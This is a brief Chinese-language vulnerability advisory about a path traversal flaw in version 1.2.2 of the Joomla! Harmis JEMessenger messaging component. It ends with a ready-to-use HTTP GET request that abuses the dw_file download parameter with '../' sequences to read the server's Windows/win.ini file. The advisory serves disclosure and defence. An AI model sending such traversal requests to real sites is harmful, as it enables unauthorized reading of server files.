漏洞描述
Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。Harmis JEMessenger component是使用在其中的一款个人消息管理组件,它支持收、发邮件和在线消息。 Joomla! Harmis JEMessenger组件1.2.2版本中存在路径遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../Windows/win.ini HTTP/1.1